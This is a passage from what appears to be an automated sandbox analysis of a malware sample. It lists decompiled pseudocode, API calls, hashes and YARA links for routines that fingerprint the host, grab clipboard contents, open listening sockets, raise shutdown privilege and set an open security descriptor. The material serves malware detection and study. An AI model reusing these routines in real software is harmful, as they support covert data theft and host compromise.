				signed int _t73;
				signed int _t76;
				signed int _t77;
				intOrPtr _t117;
				signed int _t124;
				signed int _t126;
				intOrPtr _t138;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				signed int* _t147;
				void* _t148;

				_t147 = __esi;
				_t149 =  *__esi;
				_t126 = 1;
				_v13 = 0;
				if( *__esi == 0) {
					_t124 = E00414221(_t149);
					 *__esi = _t124;
					if(_t124 == 0) {
						return 0;
					}
					_v13 = 1;
				}
				__eflags = _a4 & 0x00000001;
				if((_a4 & 0x00000001) == 0) {
					L9:
					__eflags = _a4 & 0x00000002;
					if((_a4 & 0x00000002) != 0) {
						_push( &_v12);
						_t145 = 4;
						_v12 = 0x1020702;
						_t126 = E00414234(_t147, 0x2713, _t133, _t145);
					}
					L11:
					__eflags = _a4 & 0x00000004;
					if((_a4 & 0x00000004) == 0) {
						L16:
						__eflags = _t126;
						if(_t126 == 0) {
							L29:
							__eflags = _v13 - 1;
							if(_v13 == 1) {
								E0040F0C0( *_t147);
								 *_t147 =  *_t147 & 0x00000000;
								__eflags =  *_t147;
							}
							L31:
							return _t126;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) == 0) {
							L20:
							__eflags = _t126;
							if(_t126 == 0) {
								goto L29;
							}
							__eflags = _a4 & 0x00000010;
							if((_a4 & 0x00000010) == 0) {
								L28:
								__eflags = _t126;
								if(_t126 != 0) {
									goto L31;
								}
								goto L29;
							}
							_t73 = GetModuleFileNameW(0,  &_v600, 0x103);
							_v12 = _t73;
							__eflags = _t73;
							if(_t73 > 0) {
								__eflags = 0;
								 *((short*)(_t148 + _t73 * 2 - 0x254)) = 0;
								_t126 = E004142A0(0, 0, _t147, 0x271e,  &_v600);
							}
							_v12 = 0x103;
							__eflags = _t126;
							if(_t126 == 0) {
								goto L29;
							} else {
								_t76 =  *0x416c3c(2,  &_v600,  &_v12);
								__eflags = _t76;
								if(_t76 != 0) {
									_t77 = _v12;
									__eflags = _t77;
									if(_t77 > 0) {
										__eflags = 0;
										 *((short*)(_t148 + _t77 * 2 - 0x254)) = 0;
										_t126 = E004142A0(0, 0, _t147, 0x2721,  &_v600);
									}
								}
								goto L28;
							}
						}
						_v368.dwOSVersionInfoSize = 0x11c;
						GetVersionExW( &_v368);
						_v36 = _v368.dwMajorVersion;
						_v32 = _v368.dwMinorVersion;
						_v28 = _v368.dwBuildNumber;
						_t137 = _v88 & 0x0000ffff;
						_v24 = (_v90 & 0x0000ffff) << 0x00000010 | _v92 & 0x0000ffff;
						_v20 = (_v86 & 0x000000ff) << 0x00000010 | _v88 & 0x0000ffff;
						_push( &_v36);
						_t142 = 0x14;
						_t126 = E00414234(_t147, 0x271c, _v88 & 0x0000ffff, _t142);
						__eflags = _t126;
						if(_t126 == 0) {
							goto L29;
						}
						_v12 =  *0x416eac() & 0x0000ffff;
						_push( &_v12);
						_t143 = 2;
						_t126 = E00414234(_t147, 0x271d, _t137, _t143);
						goto L20;
					}
					__eflags = _t126;
					if(_t126 == 0) {
						goto L29;
					}
					_v12 = E0040F18A();
					_push( &_v12);
					_t144 = 4;
					_t126 = E00414234(_t147, 0x2719, _t133, _t144);
					__eflags = _t126;
					if(_t126 == 0) {
						goto L29;
					}
					_v12 = E0040F1C9();
					_t126 = E00414234(_t147, 0x271b, _t133, _t144,  &_v12);
					__eflags = _t126;
					if(_t126 == 0) {
						goto L29;
					}
					_v12 = GetTickCount();
					_t126 = E00414234(_t147, 0x271a, _t133, _t144,  &_v12);
					goto L16;
				}
				_t138 =  *0x416df0; // 0x0
				_t146 =  &_v288;
				E0040F4BE(_t138,  &_v288);
				_t117 =  *0x416c64; // 0x41b000
				_t7 = _t117 + 8; // 0x0
				_v80 =  *_t7 & 0x000000ff;
				_t9 = _t117 + 9; // 0x80000000
				_v78 =  *_t9 & 0x000000ff;
				_t11 = _t117 + 0xa; // 0xee800000
				_t133 =  *_t11 & 0x000000ff;
				_v76 =  *_t11 & 0x000000ff;
				_t13 = _t117 + 0xb; // 0x36ee8000
				_v74 =  *_t13 & 0x000000ff;
				_v72 = 0;
				_t126 = E004142A0( *_t11 & 0x000000ff, __eflags, _t147, 0x2711, _t146);
				__eflags = _t126;
				if(_t126 == 0) {
					goto L11;
				}
				__eflags = _v80;
				if(__eflags != 0) {
					_t126 = E004142A0(_t133, __eflags, _t147, 0x2712,  &_v80);
				}
				__eflags = _t126;
				if(_t126 == 0) {
					goto L11;
				} else {
					goto L9;
				}
			}





































    0x00414bbb
    0x00414bc4
    0x00414bc9
    0x00414bcb
    0x00414bcf
    0x00414bd1
    0x00414bd6
    0x00414bda
    0x00000000
    0x00414bdc
    0x00414be3
    0x00414be3
    0x00414be7
    0x00414beb
    0x00414c5d
    0x00414c5d
    0x00414c61
    0x00414c66
    0x00414c69
    0x00414c71
    0x00414c7d
    0x00414c7d
    0x00414c7f
    0x00414c7f
    0x00414c83
    0x00414cef
    0x00414cef
    0x00414cf1
    0x00414e20
    0x00414e20
    0x00414e24
    0x00414e28
    0x00414e2d
    0x00414e2d
    0x00414e2d
    0x00414e30
    0x00000000
    0x00414e30
    0x00414cf7
    0x00414cfb
    0x00414d91
    0x00414d91
    0x00414d93
    0x00000000
    0x00000000
    0x00414d99
    0x00414d9d
    0x00414e1c
    0x00414e1c
    0x00414e1e
    0x00000000
    0x00000000
    0x00000000
    0x00414e1e
    0x00414dae
    0x00414db4
    0x00414db7
    0x00414db9
    0x00414dbb
    0x00414dbd
    0x00414dd7
    0x00414dd7
    0x00414dd9
    0x00414ddc
    0x00414dde
    0x00000000
    0x00414de0
    0x00414ded
    0x00414df3
    0x00414df5
    0x00414df7
    0x00414dfa
    0x00414dfc
    0x00414dfe
    0x00414e00
    0x00414e1a
    0x00414e1a
    0x00414dfc
    0x00000000
    0x00414df5
    0x00414dde
    0x00414d08
    0x00414d12
    0x00414d22
    0x00414d2b
    0x00414d34
    0x00414d40
    0x00414d44
    0x00414d50
    0x00414d56
    0x00414d59
    0x00414d66
    0x00414d68
    0x00414d6a
    0x00000000
    0x00000000
    0x00414d79
    0x00414d7f
    0x00414d82
    0x00414d8f
    0x00000000
    0x00414d8f
    0x00414c85
    0x00414c87
    0x00000000
    0x00000000
    0x00414c92
    0x00414c98
    0x00414c9b
    0x00414ca8
    0x00414caa
    0x00414cac
    0x00000000
    0x00000000
    0x00414cb7
    0x00414cca
    0x00414ccc
    0x00414cce
    0x00000000
    0x00000000
    0x00414cda
    0x00414ced
    0x00000000
    0x00414ced
    0x00414bed
    0x00414bf3
    0x00414bf9
    0x00414bfe
    0x00414c03
    0x00414c08
    0x00414c0c
    0x00414c11
    0x00414c15
    0x00414c15
    0x00414c1a
    0x00414c1e
    0x00414c23
    0x00414c29
    0x00414c3b
    0x00414c3d
    0x00414c3f
    0x00000000
    0x00000000
    0x00414c41
    0x00414c46
    0x00414c57
    0x00414c57
    0x00414c59
    0x00414c5b
    0x00000000
    0x00000000
    0x00000000
    0x00000000

    APIs
    • GetTickCount.KERNEL32 ref: 00414CD4
    • GetVersionExW.KERNEL32(?,00000000,00000000), ref: 00414D12
    • GetUserDefaultUILanguage.KERNEL32(?), ref: 00414D70
    • GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,00000000), ref: 00414DAE
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CountDefaultFileLanguageModuleNameTickUserVersion
    • String ID:
    • API String ID: 598021444-0
    • Opcode ID: 16eca74fc89336b586ebd37afff1e66e50bcedf69f557d7b955aad4f761d28f2
    • Instruction ID: 49abd19c16f38e815b90e7fad51a375ff233406b98e8aa06d008cb9afe5b29fd
    • Opcode Fuzzy Hash: 16eca74fc89336b586ebd37afff1e66e50bcedf69f557d7b955aad4f761d28f2
    • Instruction Fuzzy Hash: F961EB75A413496ADB11DBA8D844BEEBBF4AF45304F0440ABE944DB381E77C8AC9CB58
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040B798, Relevance: 6.0, APIs: 4, Instructions: 45filestringnativeCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040B798(WCHAR* __esi, void* __eflags) {
				long _v8;
				WCHAR* _v1028;
				void _v1032;
				void* _t22;

				E0040B770(__esi);
				_t22 = CreateFileW(__esi, 0x80000000, 3, 0, 3, 0x2000000, 0);
				 *__esi = 0;
				if(_t22 != 0xffffffff) {
					_v8 = _v8 & 0;
					if(NtQueryObject(_t22, 1,  &_v1032, 0x400,  &_v8) == 0 && _v1032 < 0x104) {
						_v1028[_v1032 & 0x0000ffff] = 0;
						lstrcpyW(__esi, _v1028);
					}
					return CloseHandle(_t22);
				}
				return 0;
			}







    0x0040b7a4
    0x0040b7c2
    0x0040b7c6
    0x0040b7cc
    0x0040b7ce
    0x0040b7ec
    0x0040b80b
    0x0040b816
    0x0040b816
    0x00000000
    0x0040b81d
    0x0040b825

    APIs
      • Part of subcall function 0040B770: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,00406408,?,025DF908), ref: 0040B791
    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,02000000,00000000,?), ref: 0040B7BC
    • NtQueryObject.NTDLL(00000000,00000001,?,00000400,?), ref: 0040B7E4
    • lstrcpyW.KERNEL32(?,?), ref: 0040B816
    • CloseHandle.KERNEL32(00000000), ref: 0040B81D
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseCreateFileFolderHandleObjectPathQuerySpeciallstrcpy
    • String ID:
    • API String ID: 2309192175-0
    • Opcode ID: 92decdcf104c79026c1ca96aaf6e02f4b5af6c2a7cf69c0697088bd49c7baa16
    • Instruction ID: 974b1f1183de7b1614eebe82c5495ab87078a998678a822f0778263a7167e9ee
    • Opcode Fuzzy Hash: 92decdcf104c79026c1ca96aaf6e02f4b5af6c2a7cf69c0697088bd49c7baa16
    • Instruction Fuzzy Hash: CF01F2B1600314A7E720AB64DC85FAA72BCEF44704F1080A6F702F61D1E7B49A828B9C
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004105F2, Relevance: 6.0, APIs: 4, Instructions: 26networkCOMMON
    Download Yara Rule
    APIs
    • socket.WS2_32(?,00000001,00000006), ref: 004105FB
    • bind.WS2_32(00000000,?,?), ref: 0041060E
    • listen.WS2_32(00000000,?), ref: 0041061D
    • closesocket.WS2_32(00000000), ref: 00410628
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: bindclosesocketlistensocket
    • String ID:
    • API String ID: 952684215-0
    • Opcode ID: 7b85ef0401e2d4b256e0ac6150032e3f53cf9799cffa572d4f4f0c54fd6fa37e
    • Instruction ID: 2a162d66f975acf3ab08c7a23a54b4e3cebde95cbf575b336e71c9ff73e8f6c9
    • Opcode Fuzzy Hash: 7b85ef0401e2d4b256e0ac6150032e3f53cf9799cffa572d4f4f0c54fd6fa37e
    • Instruction Fuzzy Hash: C7E09231305120BACA212B65AC4CEDF7B68AF85771F028225F8A9D51E0D369C8E1C69C
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00405F48, Relevance: 4.6, APIs: 3, Instructions: 77clipboardCOMMON
    Download Yara Rule
    C-Code - Quality: 96%
    			E00405F48(void* __ebp, signed int _a4) {
				intOrPtr _v0;
				void* _v4;
				void* _v8;
				void* __ecx;
				void* __edi;
				void* _t9;
				intOrPtr _t12;
				void* _t23;
				void* _t25;
				void* _t28;
				int _t39;
				void* _t42;
				void* _t43;

				_t42 = __ebp;
				_t39 = _a4;
				_t9 = GetClipboardData(_t39);
				_t28 = _t9;
				_v4 = _t28;
				if(_t28 != 0 && (_t39 == 1 || _t39 == 0xd || _t39 == 7)) {
					GlobalFix(_t28);
					_t23 = _t9;
					if(_t23 != 0) {
						_a4 = _a4 & 0x00000000;
						if(_t39 == 0xd) {
							_push(_t42);
							_t26 = _t23;
							_t43 = E0040F533(_t23);
							_t12 = E0040F47D(_t11, _t23);
							_v0 = _t12;
							if(_t12 != 0) {
								_t40 = " ";
								E00405E57(_t26, 1, " ");
								if(_t43 != 0) {
									E00405E57(_t26, _t43, _a4);
								}
								E00405E57(_t26, 1, _t40);
							}
						} else {
							_t41 = " ";
							E00405E57(_t25, 1, " ");
							_t27 = _t23;
							if(E0040F521(_t23) != 0) {
								E00405E57(_t27, _t19, _t23);
							}
							E00405E57(_t27, 1, _t41);
						}
						E0040F0C0(_a4);
						_t28 = _v8;
						GlobalUnWire(_t28);
					}
				}
				return _t28;
			}
















    0x00405f48
    0x00405f4a
    0x00405f50
    0x00405f56
    0x00405f58
    0x00405f5e
    0x00405f79
    0x00405f7f
    0x00405f83
    0x00405f89
    0x00405f91
    0x00405fbf
    0x00405fc0
    0x00405fc8
    0x00405fca
    0x00405fcf
    0x00405fd5
    0x00405fd7
    0x00405fe0
    0x00405fe7
    0x00405fef
    0x00405fef
    0x00405ff8
    0x00405ff8
    0x00405f93
    0x00405f93
    0x00405f9c
    0x00405fa1
    0x00405faa
    0x00405faf
    0x00405faf
    0x00405fb8
    0x00405fb8
    0x00406002
    0x00406007
    0x0040600c
    0x0040600c
    0x00406012
    0x00406018

    APIs
    • GetClipboardData.USER32(?), ref: 00405F50
    • GlobalFix.KERNEL32(00000000), ref: 00405F79
    • GlobalUnWire.KERNEL32(?), ref: 0040600C
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Global$ClipboardDataWire
    • String ID:
    • API String ID: 2697403597-0
    • Opcode ID: 8f0ff6350d98cab08660f04cd8c08460a9e90e0cf3a8989dee9195912e57e1e1
    • Instruction ID: a979775c61c09f8d603f94c935bbd7556576786c6e9fa69d0f39f89aa571b994
    • Opcode Fuzzy Hash: 8f0ff6350d98cab08660f04cd8c08460a9e90e0cf3a8989dee9195912e57e1e1
    • Instruction Fuzzy Hash: BB11063250471256C7203B269C48A7F6599CFC1364B06003FF999B32D1CF3CCC169EAA
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0041090B, Relevance: 4.5, APIs: 3, Instructions: 21networkCOMMON
    Download Yara Rule
    APIs
    • socket.WS2_32(00000000,00000002,00000011), ref: 00410914
    • bind.WS2_32(00000000,?,?), ref: 00410927
    • closesocket.WS2_32(00000000), ref: 00410932
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: bindclosesocketsocket
    • String ID:
    • API String ID: 1873677229-0
    • Opcode ID: 310005af9faf61fe6c97c76e4f86e90c5a8e174efb1e6be04dd20496bec820a0
    • Instruction ID: f2ca8ff3a07caf86e12ca5d5eaddf77f0ad93a0b04fb29f2f3b963221d450303
    • Opcode Fuzzy Hash: 310005af9faf61fe6c97c76e4f86e90c5a8e174efb1e6be04dd20496bec820a0
    • Instruction Fuzzy Hash: 7DE0C2313011307AD6202B79AC0DEDB7A58AF85B71B024725FE64E61F1D364CCC1CAA8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040C268, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13shutdownCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040C268() {
				intOrPtr _v0;

				E0041158D(L"SeShutdownPrivilege");
				return ExitWindowsEx((0 | _v0 != 0x00000000) + 0x00000001 | 0x00000004, 0) & 0xffffff00 | _t11 != 0x00000000;
			}




    0x0040c26d
    0x0040c28d

    APIs
      • Part of subcall function 0041158D: OpenProcessToken.ADVAPI32(FFFFFFFF,00000028,?,00000000,0040B71D,SeDebugPrivilege), ref: 004115A2
      • Part of subcall function 0041158D: LookupPrivilegeValueW.ADVAPI32(00000000), ref: 004115C2
      • Part of subcall function 0041158D: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000010,00000000,00000000), ref: 004115D8
      • Part of subcall function 0041158D: GetLastError.KERNEL32 ref: 004115E2
      • Part of subcall function 0041158D: FindCloseChangeNotification.KERNELBASE(?), ref: 004115F1
    • ExitWindowsEx.USER32(00000001,00000000), ref: 0040C282
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Token$AdjustChangeCloseErrorExitFindLastLookupNotificationOpenPrivilegePrivilegesProcessValueWindows
    • String ID: SeShutdownPrivilege
    • API String ID: 1103692467-3733053543
    • Opcode ID: c615b6d400903ce37109fe8218cee52a06abed6ee0ce5b1429362934808d4e50
    • Instruction ID: fb4196973f3b5a490a35593853b61c08d9d438a744ee0b699e5c8e0c693b5694
    • Opcode Fuzzy Hash: c615b6d400903ce37109fe8218cee52a06abed6ee0ce5b1429362934808d4e50
    • Instruction Fuzzy Hash: C7C0805075534175F20027710E0678F159D4B50B54F05CC3B7143D1091C42CC5609135
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004104CA, Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
    Download Yara Rule
    APIs
    • select.WS2_32(00000000,?,00000000,00000000,0000000C), ref: 0041051A
    • recv.WS2_32(0000000C,00000000,?,00000000), ref: 00410532
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: recvselect
    • String ID:
    • API String ID: 741273618-0
    • Opcode ID: 0c64d64840408cf9034cce54cdce863c200e9d442939e634d4933789ce04ab68
    • Instruction ID: 55d6b81a786bfd976c474ad530761da75a775ec14bf99daa55d652bf5fac1638
    • Opcode Fuzzy Hash: 0c64d64840408cf9034cce54cdce863c200e9d442939e634d4933789ce04ab68
    • Instruction Fuzzy Hash: E4016D71900208AFDB05DF68DCC5AEE7BBEFB55304F00C56AA515D6180D6B89AC08F50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00414AEA, Relevance: 3.0, APIs: 2, Instructions: 24COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00414AEA() {
				void* _t1;

				E0040F173(_t1, 0x417680, 0, 0x24);
				if(InitializeSecurityDescriptor(0x41768c, 1) != 0 && SetSecurityDescriptorDacl(0x41768c, 1, 0, 0) != 0) {
					 *0x417688 =  *0x417688 & 0x00000000;
					 *0x417680 = 0xc;
					 *0x417684 = 0x41768c;
				}
				return 1;
			}




    0x00414af4
    0x00414b09
    0x00414b1c
    0x00414b23
    0x00414b2d
    0x00414b2d
    0x00414b36

    APIs
    • InitializeSecurityDescriptor.ADVAPI32(0041768C,00000001,00417680,00000000,00000024,?,0040B5EE), ref: 00414B01
    • SetSecurityDescriptorDacl.ADVAPI32(0041768C,00000001,00000000,00000000,?,0040B5EE), ref: 00414B12
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: DescriptorSecurity$DaclInitialize
    • String ID:
    • API String ID: 625223987-0
    • Opcode ID: 38bdc0f5bbf64d3af3f85f51fdcb23ed92a622ac397bc55bef86f0d9f1f218e3
    • Instruction ID: daa61969469bf381f2ae4d96f20dc0914e16a31f6642663e1bd52fe2bd73324c
    • Opcode Fuzzy Hash: 38bdc0f5bbf64d3af3f85f51fdcb23ed92a622ac397bc55bef86f0d9f1f218e3
    • Instruction Fuzzy Hash: F9E04F303DAB1066E7201F19BC0AFC73A649B00B25F12403AF204692D0D7FD9881969C
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00405B6F, Relevance: 1.5, APIs: 1, Instructions: 43libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 37%
    			E00405B6F(intOrPtr _a4, short* _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _t10;
				intOrPtr _t13;
				void* _t15;
				intOrPtr _t16;
				short* _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t16 = _a4;
				_t18 = _t16 -  *0x416c54; // 0x70950000
				if(_t18 == 0) {
					L2:
					if(_t17 == 0) {
						L4:
						_t13 = 0;
						L5:
						if(_t17 == 0) {
							L8:
							_t9 = 0;
							L9:
							_t10 = E00407619(_t13, _t15, _t16, _t9, _a12, _t13);
							if(_t10 == 0) {
								return  *0x416cf4(_t16, _t17, _a12, _a16);
							}
							 *_a16 = _t10;
							return 0;
						}
						_t9 =  *((intOrPtr*)(_t17 + 4));
						if( *((intOrPtr*)(_t17 + 4)) == 0 ||  *_t17 <= 0) {
							goto L8;
						} else {
							goto L9;
						}
					}
					_t13 =  *((intOrPtr*)(_t17 + 4));
					goto L5;
				}
				_t19 = _t16 -  *0x416d88; // 0x75300000
				if(_t19 != 0) {
					goto L4;
				}
				goto L2;
			}










    0x00405b73
    0x00405b77
    0x00405b7a
    0x00405b80
    0x00405b8a
    0x00405b8c
    0x00405b93
    0x00405b93
    0x00405b95
    0x00405b97
    0x00405ba6
    0x00405ba6
    0x00405ba8
    0x00405bae
    0x00405bb5
    0x00000000
    0x00405bc8
    0x00405bba
    0x00000000
    0x00405bbc
    0x00405b99
    0x00405b9e
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00405b9e
    0x00405b8e
    0x00000000
    0x00405b8e
    0x00405b82
    0x00405b88
    0x00000000
    0x00000000
    0x00000000

    APIs
    • LdrGetProcedureAddress.NTDLL(?,?,?,?), ref: 00405BC8
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressProcedure
    • String ID:
    • API String ID: 3653107232-0
    • Opcode ID: ec4f7c8eb7ccf22d201d19830f1b5d668262a0832b0d41f37a3c22242886ed26
    • Instruction ID: a2358e1ada1fb45ea4183a9006e5cd8bf08a8af6798f7291db2c34c81f8e8fa3
    • Opcode Fuzzy Hash: ec4f7c8eb7ccf22d201d19830f1b5d668262a0832b0d41f37a3c22242886ed26
    • Instruction Fuzzy Hash: 21018632601A15ABCB219F54DD0097B77B9EF80750709483AFC05A7280D778FC10DFA9
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040F1C9, Relevance: 1.5, APIs: 1, Instructions: 21timeCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040F1C9() {
				long _t7;
				signed int _t8;
				intOrPtr _t9;
				void* _t12;
				void* _t14;

				_t12 = _t14 - 0x78;
				_t7 = GetTimeZoneInformation(_t12 - 0x34);
				if(_t7 != 1) {
					if(_t7 != 2) {
						_t8 = 0;
					} else {
						_t9 =  *((intOrPtr*)(_t12 + 0x74));
						goto L4;
					}
				} else {
					_t9 =  *((intOrPtr*)(_t12 + 0x20));
					L4:
					_t8 = (_t9 +  *(_t12 - 0x34)) * 0xffffffc4;
				}
				return _t8;
			}








    0x0040f1ca
    0x0040f1d8
    0x0040f1e1
    0x0040f1eb
    0x0040f1fa
    0x0040f1ed
    0x0040f1ed
    0x00000000
    0x0040f1ed
    0x0040f1e3
    0x0040f1e3
    0x0040f1f0
    0x0040f1f5
    0x0040f1f5
    0x0040f200

    APIs
    • GetTimeZoneInformation.KERNEL32(?), ref: 0040F1D8
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: InformationTimeZone
    • String ID:
    • API String ID: 565725191-0
    • Opcode ID: 8a05c317de1b158e3180cbb6e5704087a935c7be60a80a93202687f8cfdda6df
    • Instruction ID: d77e428eff7c9fe66bcd79913e57865555d9b076c2ab45fe37091f3f7610ca66
    • Opcode Fuzzy Hash: 8a05c317de1b158e3180cbb6e5704087a935c7be60a80a93202687f8cfdda6df
    • Instruction Fuzzy Hash: 62E04F30644108CBDB34DBA4DE4189D77A9AB05314F300536E402FA280D62CDE4E9A06
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004096D8, Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON
    Download Yara Rule
    C-Code - Quality: 37%
    			E004096D8(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _t6;
				void* _t9;
				void* _t10;
				void* _t12;

				_t6 = _a8;
				if( *0x418080 != 0xffffffff) {
					L3:
					return  *0x416ab8(_a4, _t6, _a12, _a16);
				}
				_t12 = _t6 -  *0x416a10; // 0x0
				if(_t12 != 0) {
					goto L3;
				}
				return E00409430(_t9, _t10, _a4);
			}







    0x004096e2
    0x004096e5
    0x004096f9
    0x00000000
    0x00409703
    0x004096e7
    0x004096ed
    0x00000000
    0x00000000
    0x00000000

    APIs
    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00409703
      • Part of subcall function 00409430: RtlEnterCriticalSection.NTDLL(00416A34), ref: 00409441
      • Part of subcall function 00409430: GetWindowInfo.USER32(?,?), ref: 00409462
      • Part of subcall function 00409430: SelectObject.GDI32(00000000), ref: 0040952C
      • Part of subcall function 00409430: GetCurrentThreadId.KERNEL32 ref: 0040955E
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Window$CriticalCurrentEnterInfoNtdllObjectProc_SectionSelectThread
    • String ID:
    • API String ID: 449601525-0
    • Opcode ID: f6e22ed84a5f80525afb4bc47cee31e8a34fde99d01d2a0daacedfed01a4366c
    • Instruction ID: 4737f9f0c64fbcd1014066bf88af9a11bc940a9183b5ce9035b713f7c28c8dbc
    • Opcode Fuzzy Hash: f6e22ed84a5f80525afb4bc47cee31e8a34fde99d01d2a0daacedfed01a4366c
    • Instruction Fuzzy Hash: A8E0EC3100010DEBCF11EF54EC409AA3B69BB05360B01CA36F925655B2CB369C61EB59
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004102DA, Relevance: .2, Instructions: 190COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 98%
    			E004102DA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				unsigned int _t67;
				signed int _t68;
				intOrPtr _t71;
				void* _t79;
				signed int _t81;
				intOrPtr _t87;
				intOrPtr _t88;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t102;
				unsigned int _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				signed int _t111;
				signed int _t115;
				signed int _t116;
				intOrPtr* _t119;
				unsigned int _t125;
				signed int _t126;
				signed int _t128;

				_t71 = _a4;
				_t98 = 0;
				_t99 = 0;
				_v16 = 0;
				_v20 = 1;
				L1:
				while(1) {
					if(_t99 <= 0) {
						_t103 =  *(_t98 + _t71);
						_t98 = _t98 + 4;
						_t99 = 0x1f;
						_t104 = _t103 >> 0x1f;
					} else {
						_t99 = _t99 - 1;
						_t104 = _t67 >> _t99 & 0x00000001;
					}
					if(_t104 != 0) {
						_v16 = _v16 + 1;
						 *((char*)(_v16 + _a12)) =  *(_t98 + _t71);
						_t98 = _t98 + 1;
						L6:
						_t71 = _a4;
						continue;
					}
					_v12 = 1;
					do {
						if(_t99 <= 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t100 = 0x1f;
							_t106 = _t67 >> 0x1f;
						} else {
							_t100 = _t99 - 1;
							_t106 = _t67 >> _t100 & 0x00000001;
						}
						_v12 = _t106 + _v12 * 2;
						if(_t100 <= 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t108 = _t67 >> 0x1f;
						} else {
							_t99 = _t100 - 1;
							_t108 = _t67 >> _t99 & 0x00000001;
						}
					} while (_t108 == 0);
					_t111 = _v12;
					if(_t111 == 2) {
						_t81 = _v20;
						L19:
						_v12 = _t81;
						if(_t99 <= 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t101 = 0x1f;
							_v8 = _t67 >> 0x1f;
						} else {
							_t101 = _t99 - 1;
							_v8 = _t67 >> _t101 & 0x00000001;
						}
						if(_t101 <= 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t115 = _t67 >> 0x1f;
						} else {
							_t99 = _t101 - 1;
							_t115 = _t67 >> _t99 & 0x00000001;
						}
						_t116 = _t115 + _v8 * 2;
						_v8 = _t116;
						if(_t116 == 0) {
							_v8 = 1;
							do {
								if(_t99 <= 0) {
									_t125 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t102 = 0x1f;
									_t126 = _t125 >> 0x1f;
								} else {
									_t102 = _t99 - 1;
									_t126 = _t67 >> _t102 & 0x00000001;
								}
								_v8 = _t126 + _v8 * 2;
								if(_t102 <= 0) {
									_t67 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t99 = 0x1f;
									_t128 = _t67 >> 0x1f;
								} else {
									_t99 = _t102 - 1;
									_t128 = _t67 >> _t99 & 0x00000001;
								}
							} while (_t128 == 0);
							_v8 = _v8 + 2;
						}
						asm("sbb ecx, ecx");
						_v8 = _v8 +  ~0xd00;
						_t87 = _v16;
						_t119 = _t87 - _v12 + _a12;
						_v16 = _t119;
						 *((char*)(_t87 + _a12)) =  *_t119;
						_t88 = _t87 + 1;
						_v16 = _v16 + 1;
						do {
							 *((char*)(_t88 + _a12)) =  *_v16;
							_t88 = _t88 + 1;
							_v16 = _v16 + 1;
							_t57 =  &_v8;
							 *_t57 = _v8 - 1;
						} while ( *_t57 != 0);
						_v16 = _t88;
						goto L6;
					}
					_t79 = ( *(_t98 + _t71) & 0x000000ff) + (_t111 + 0xfffffffd << 8);
